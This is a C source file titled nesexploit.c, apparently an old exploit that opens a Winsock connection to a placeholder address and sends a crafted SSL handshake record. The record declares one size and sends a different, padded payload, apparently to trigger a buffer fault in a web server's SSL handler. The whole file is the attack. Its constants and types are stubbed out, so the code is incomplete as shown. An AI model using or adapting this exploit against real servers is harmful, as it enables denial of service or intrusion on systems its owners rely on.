
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_3__ {int s_addr; } ;
struct TYPE_4__ {scalar_t__* sin_zero; TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
typedef TYPE_2__ sockaddr_in ;
typedef int sockaddr ;
typedef int peer ;
typedef int WSADATA ;
typedef int SOCKET ;


 int ACTUAL_SIZE ;
 int AF_INET ;
 int IPPROTO_TCP ;
 unsigned char PADDING ;
 int PF_INET ;
 int SOCKET_ERROR ;
 int SOCK_STREAM ;
 int SPECIFIED_SIZE ;
 int WSACleanup () ;
 int WSAStartup (int,int *) ;
 int closesocket (int ) ;
 int connect (int ,int *,int) ;
 int htons (unsigned short) ;
 int inet_addr (char*) ;
 int printf (char*) ;
 int send (int ,unsigned char*,int ,int) ;
 int socket (int ,int ,int ) ;
 unsigned short xxxxx ;

void main(void)
{


      char ipaddr[25] = "xxx.xxx.xxx.xxx";


      unsigned short port = xxxxx;

      SOCKET socket1;
      unsigned char s[65536];
      int errorCode;
      WSADATA winSockData;
      sockaddr_in peer;
      int result;
      unsigned char i;
      unsigned int l;
      int flags;

      printf("\nnesexploit.c - developed by Arne Vidstrom, winnt@bahnhof.se\n\n");


      errorCode = WSAStartup(0x0101, &winSockData);
      socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
      peer.sin_family = AF_INET;
      peer.sin_port = htons(port);
      peer.sin_addr.s_addr = inet_addr(ipaddr);
      for (i = 0; i < 8; i++)
              peer.sin_zero[i] = 0;
      result = connect(socket1, (sockaddr *) &peer, sizeof(peer));
      if (result != 0)
              printf("Ehmn, where's that server? ;o)\n\n");


      for (l=0; l<65536; l++)
              s[l] = '.';




      s[0] = (SPECIFIED_SIZE & 0xff00) >> 8;
      s[1] = (SPECIFIED_SIZE & 0x00ff);
      s[2] = PADDING;


      s[3] = 0x01;


      s[4] = 0x03;
      s[5] = 0x00;


      s[6] = 0x00;
      s[7] = 0x0c;


      s[8] = 0x00;
      s[9] = 0x00;


      s[10] = 0x00;
      s[11] = 0x10;


      s[12] = 0x02;
      s[13] = 0x00;
      s[14] = 0x80;

      s[15] = 0x04;
      s[16] = 0x00;
      s[17] = 0x80;

      s[18] = 0x00;
      s[19] = 0x00;
      s[20] = 0x03;

      s[21] = 0x00;
      s[22] = 0x00;
      s[23] = 0x06;






      flags = 0;
      result = send(socket1, s, ACTUAL_SIZE, flags);
      if (result != SOCKET_ERROR)
              printf("Done!\n\n");


      closesocket(socket1);
      WSACleanup();
}
